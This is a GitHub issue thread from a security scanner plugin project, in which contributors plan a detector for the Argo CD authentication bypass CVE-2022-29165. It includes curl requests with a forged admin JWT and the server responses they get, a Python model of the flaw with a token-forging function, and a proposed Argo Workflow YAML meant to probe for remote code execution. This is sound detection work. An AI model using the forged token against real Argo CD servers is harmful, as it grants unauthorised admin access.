google / tsunami-security-scanner-plugins

This project aims to provide a central repository for many useful Tsunami Security Scanner plugins.
Apache License 2.0

AI PRP: Request CVE-2022-29165 Argo CD Auth Bypass #431

Open maoning opened 3 months ago

maoning commented 3 months ago

Reference: https://github.com/advisories/GHSA-r642-gv9p-2wjj

Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.

JamesFoxxx commented 3 months ago

I just saw your tweet; working on this issue is exciting for me :))

maoning commented 3 months ago

Hi @JamesFoxxx,

Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:

JamesFoxxx commented 3 months ago

Hi, I read the source code of argo-cd and the fix commit of the CVE here and I'm happy that I managed to exploit this CVE.

I tried to find endpoints that an anonymous user can't access, and endpoints that don't need further setup on Argo CD, like installing additional applications.

An anonymous user can't get the list of certificates; the request in this case is:

curl -i -s -k -X $'GET'  -H $'Host: argocdHOST'   -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ'  $'https://127.0.0.1:8081/api/v1/certificates'

and the response is:

HTTP/1.1 403 Forbidden
Content-Type: application/json
Date: Mon, 25 Mar 2024 03:24:05 GMT
Content-Length: 110
Connection: close

{"error":"permission denied: certificates, get, ","code":7,"message":"permission denied: certificates, get, "}

However, with the help of the CVE, we can send a request like the following:

curl -i -s -k -X $'GET'  -H $'Host: argocdHOST'   -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ'  $'https://127.0.0.1:8081/api/v1/certificates'

Note that the argocd.token is a forged token. I can confirm that the response is the same as for an authenticated admin:

HTTP/1.1 200 OK
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Mon, 25 Mar 2024 03:34:04 GMT
Content-Length: 1421

{"metadata":{},"items":[{"serverName":"bitbucket.org","certType":"ssh","certSubType":"ssh-rsa","certData":null,"certInfo":"SHA256:zzXQOXSRBEiUtuE8AikJYKwbHaxvSc0ojez9YXaGp1A"},
...
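The bypass shown above, together with the comparison a scanner plugin would make (an anonymous probe versus a forged-admin probe, plus the "anonymous caller is already admin" case discussed later in this thread), as an added example that is not part of the thread and is not Tsunami or Argo CD code. The `ArgoLikeServer` class is a toy model of the flaw as the advisory describes it (a token whose signature fails verification is tolerated when anonymous access is enabled, and its unverified claims are kept); the HTTP layer is reduced to status codes, and all class, function and parameter names are assumptions of this example. `THREAD_TOKEN` is the forged token posted above.

```python
"""Model of the CVE-2022-29165 check (added example; not Tsunami's or Argo CD's code)."""
import base64
import hashlib
import hmac
import json
import secrets

# Forged token posted in the thread: header {"alg":"HS256","typ":"JWT"},
# payload {"sub":"admin"}, and a signature no real server key will validate.
THREAD_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                "eyJzdWIiOiJhZG1pbiJ9."
                "TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ")


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_input(subject: str) -> str:
    """header.payload for an HS256 token carrying only a subject claim."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps({"sub": subject}, separators=(",", ":")).encode())
    return f"{header}.{payload}"


def forge_token(subject: str = "admin") -> str:
    """Attacker side: arbitrary subject, random bytes where the signature belongs."""
    return f"{_signing_input(subject)}.{b64url_encode(secrets.token_bytes(32))}"


def sign_token(subject: str, key: bytes) -> str:
    """Legitimate token, signed with the server's key (used to show the fix keeps sessions working)."""
    signing_input = _signing_input(subject)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def parse_claims_unverified(token: str) -> dict:
    """What a JWT parser does first: decode the payload without checking the signature."""
    return json.loads(b64url_decode(token.split(".")[1]))


def signature_valid(token: str, key: bytes) -> bool:
    header, payload, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


class ArgoLikeServer:
    """Toy API server (an assumption of this example, not Argo CD's code)."""

    def __init__(self, anonymous_enabled: bool, patched: bool, anonymous_role: str = "none"):
        self.key = secrets.token_bytes(32)  # signing key the attacker never learns
        self.anonymous_enabled = anonymous_enabled
        self.patched = patched
        self.anonymous_role = anonymous_role  # RBAC role granted to anonymous callers

    def authenticate(self, token):
        """Return the subject the request acts as, or None for an anonymous caller."""
        if token is None:
            if self.anonymous_enabled:
                return None
            raise PermissionError("no token")
        claims = parse_claims_unverified(token)
        if signature_valid(token, self.key):
            return claims["sub"]
        if not self.anonymous_enabled:
            raise PermissionError("invalid session")
        # Anonymous access is on, so a bad token is tolerated. The flaw modelled here:
        # the unpatched path keeps the already-parsed claims instead of downgrading.
        return None if self.patched else claims["sub"]

    def get_certificates(self, token) -> int:
        """Mimic GET /api/v1/certificates: 401 unauthenticated, 403 denied, 200 for admin."""
        try:
            subject = self.authenticate(token)
        except PermissionError:
            return 401
        role = "admin" if subject == "admin" else (self.anonymous_role if subject is None else "user")
        return 200 if role == "admin" else 403


def classify(server: ArgoLikeServer) -> str:
    """The plugin's decision: a no-token probe versus a forged-admin probe on the same endpoint."""
    anonymous_status = server.get_certificates(None)
    forged_status = server.get_certificates(forge_token("admin"))
    if anonymous_status == 200:
        return "exposed: anonymous caller already has admin access"
    if anonymous_status in (401, 403) and forged_status == 200:
        return "vulnerable: forged token accepted (CVE-2022-29165)"
    return "not vulnerable"


if __name__ == "__main__":
    for anon, patched in ((True, False), (True, True), (False, False)):
        print(f"anonymous={anon} patched={patched}: {classify(ArgoLikeServer(anon, patched))}")
```

The baseline probe matters as much as the forged one: a 200 on the anonymous request means the instance is already open (no bypass needed), while a 200 only on the forged-token request is the signature-tolerance bug. A real plugin would also send a token with a subject that does not exist to rule out servers that answer 200 to everything.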
maoning commented 3 months ago

@JamesFoxxx Thanks for submitting the testing configs to security-testbeds, they are really helpful for me to understand how Argo CD works as well.

What you proposed could work, but I think we can make this plugin more effective by detecting all exposed Argo services including but not limited to CVE-2022-29165 for max bounty.

Could you check if it is possible to submit a workflow like this to all versions of exposed Argo services:

apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: ''
  generateName: scripts-
spec:
  destination:
    name: ''
    namespace: ''
    server: ''
  source:
    path: ''
    repoURL: ''
    targetRevision: HEAD
  project: ''
  entrypoint: tsunami-rce
  templates:
    - name: tsunami-rce
      steps:
        - - name: generate
            template: gen-printf-bash
        - - name: print
            template: print-message
            arguments:
              parameters:
                - name: message
                  value: '{{steps.generate.outputs.result}}'
    - name: gen-printf-bash
      script:
        image: 'debian:9.4'
        command:
          - bash
        source: |
          printf %s%s%s TSUNAMI_PAYLOAD_START randomstring TSUNAMI_PAYLOAD_END  # Generate from Tsunami payload generator

The plugin will cover the following scenarios:

  1. CVE-2022-29165: auth configured but can be bypassed
  2. All other versions of Argo CD with no Auth

References:

JamesFoxxx commented 3 months ago

@maoning, the links and the payload that you are referring to are for Argo Workflows, not Argo CD. I can write a separate plugin for Argo Workflows, however, which is as popular as Argo CD. Argo CD and Argo Workflows differences: https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-1837543 https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-2177941

The good news is that I found out how to enable anonymous admin access for Argo CD.

maoning commented 3 months ago

Great, thanks for spotting the difference!

For argo workflow, we have an existing plugin: https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argoworkflow/ExposedArgoworkflowDetector.java

If you see significant value for a separate Argo Workflow plugin, please post it in a separate plugin request, I will review it.

For the current request, if there's no easy way to trigger RCE, then let's move forward with your proposal + anonymous admin access case.

Please submit our participation form and you can start working on the development.